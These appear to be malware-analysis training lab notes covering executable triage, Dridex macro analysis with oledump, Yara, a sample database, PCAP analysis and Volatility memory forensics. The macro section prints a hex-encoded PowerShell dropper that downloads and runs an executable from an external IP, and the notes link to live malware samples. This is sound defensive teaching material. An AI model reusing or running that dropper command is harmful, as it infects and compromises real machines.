############################

# Download the Analysis VM #

############################

https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip

user: infosecaddicts

pass: infosecaddicts

- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging please open a terminal window and type the following commands:

cd Desktop/

- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':

cd /home/infosecaddicts/Desktop/

wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate

wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate

unzip malware-password-is-infected.zip

	infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'***

Reference: 

http://www.garykessler.net/library/file_sigs.html

objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

							- We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join			

strings malware.exe | grep -i admin

strings malware.exe | grep -i list

							- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile

     malware

vi analyse_malware.py

python analyse_malware.py malware.exe

Building a Malware Scanner

--------------------------

mkdir ~/Desktop/malwarescanner

cd ~/Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir ~/Desktop/malcode

cp ~/Desktop/malware.exe ~/Desktop/malcode

python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt

cd ~/Desktop/

#####################################################

# Analyzing Macro Embedded Malware                  #

# Reference:                                        #

# https://jon.glass/analyzes-dridex-malware-p1/     #

#####################################################

cp ~/Desktop/

- Create a FREE account on:

https://malwr.com/account/signup/

- Grab the malware from:

https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

sudo pip install olefile

     malware

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc

-----------------------------------------------------------------------------------------------------------------------------------

sudo pip install olefile

     malware

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip

unzip 064016.zip

     infected

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams. 

- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’. 

python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see: 

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:

http://www.rapidtables.com/convert/number/hex-to-ascii.htm

##############

# Yara Ninja #

##############

sudo apt-get remove -y yara

     malware

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool

     malware

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo make install

	malware

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd ~/Desktop

yara rules-master/packer.yar malcode/malware.exe

Places to get more Yara rules:

------------------------------

https://malwareconfig.com/static/yaraRules/

https://github.com/kevthehermit/YaraRules

https://github.com/VectraThreatLab/reyara

Yara rule sorting script:

-------------------------

https://github.com/mkayoh/yarasorter

cd ~/Desktop/rules-master

for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar

cd ~/Desktop/

yara rules-master/master.yar malcode/malware.exe

Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:

http://derekmorton.name/files/malware_12-14-12.sql.bz2

Malware Repositories:

http://malshare.com/index.php

http://www.malwareblacklist.com/

http://www.virusign.com/

http://virusshare.com/

http://www.tekdefense.com/downloads/malware-samples/

###############################

# Creating a Malware Database #

###############################

Creating a malware database (sqlite)

------------------------------------

sudo apt-get install -y python-simplejson python-simplejson-dbg

	malware

wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py

wget wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip

unzip malware-password-is-infected.zip

	infected

python avsubmit.py --init

python avsubmit.py -f malware.exe -e

Creating a malware database (mysql)

-----------------------------------

- Step 1: Installing MySQL database

- Run the following command in the terminal:

sudo apt-get install mysql-server

     malware

- Step 2: Installing Python MySQLdb module

- Run the following command in the terminal:

sudo apt-get build-dep python-mysqldb

     malware

sudo apt-get install python-mysqldb

     malware

Step 3: Logging in 

Run the following command in the terminal:

mysql -u root -p					(set a password of 'malware')

- Then create one database by running following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py						(fill in database connection information)

python mal_to_db.py -i

------- check it to see if the files table was created ------

mysql -u root -p

	malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------

- Now add the malicious file to the DB

python mal_to_db.py -f malware.exe -u

- Now check to see if it is in the DB

mysql -u root -p

	malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;

#################

# PCAP Analysis #

#################

cd /home/infosecaddicts/Desktop/Browser\ Forensics

ls | grep pcap

perl chaosreader.pl suspicious-time.pcap

firefox index.html

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs

     malware   

for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u

#############################

# PCAP Analysis with tshark #

#############################

tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u

tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u

tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq

tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"

whois rapidshare.com.eyu32.ru

whois sploitme.com.cn

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' 

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'

######################################

# PCAP Analysis with forensicPCAP.py #

######################################

cd ~/Desktop

wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py

sudo easy_install cmd2

     malware

python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap

ForPCAP >>> help

Prints stats about PCAP

ForPCAP >>> stat

Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.

ForPCAP >>> dns

ForPCAP >>> show

Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.

ForPCAP >>> dstports

ForPCAP >>> show

Prints the number of ip source and store them.

ForPCAP >>> ipsrc

ForPCAP >>> show

Prints the number of web's requests and store them

ForPCAP >>> web

ForPCAP >>> show

Prints the number of mail's requests and store them

ForPCAP >>> mail

ForPCAP >>> show

###################

# Memory Analysis #

###################

cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility

python volatility

python volatility pslist -f ../hn_forensics.vmem

python volatility connscan2 -f ../hn_forensics.vmem

python volatility memdmp -p 888 -f ../hn_forensics.vmem

python volatility memdmp -p 1752 -f ../hn_forensics.vmem

				***Takes a few min***

strings 1752.dmp | grep "^http://" | sort | uniq

strings 1752.dmp | grep "Ahttps://" | uniq -u

cd ..

foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2

cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/

cat audit.txt

cd pdf

ls

grep -i javascript *.pdf

cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf

wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip

unzip pdf-parser_V0_6_4.zip

python pdf-parser.py -s javascript --raw 00600328.pdf

python pdf-parser.py --object 11 00600328.pdf

python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js

*****Sorry - no time to cover javascript de-obfuscation today*****

cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/

python volatility files -f ../hn_forensics.vmem > files

cat files | less

python volatility malfind -f ../hn_forensics.vmem -d out

ls out/

python volatility hivescan -f ../hn_forensics.vmem									

python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon	

for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done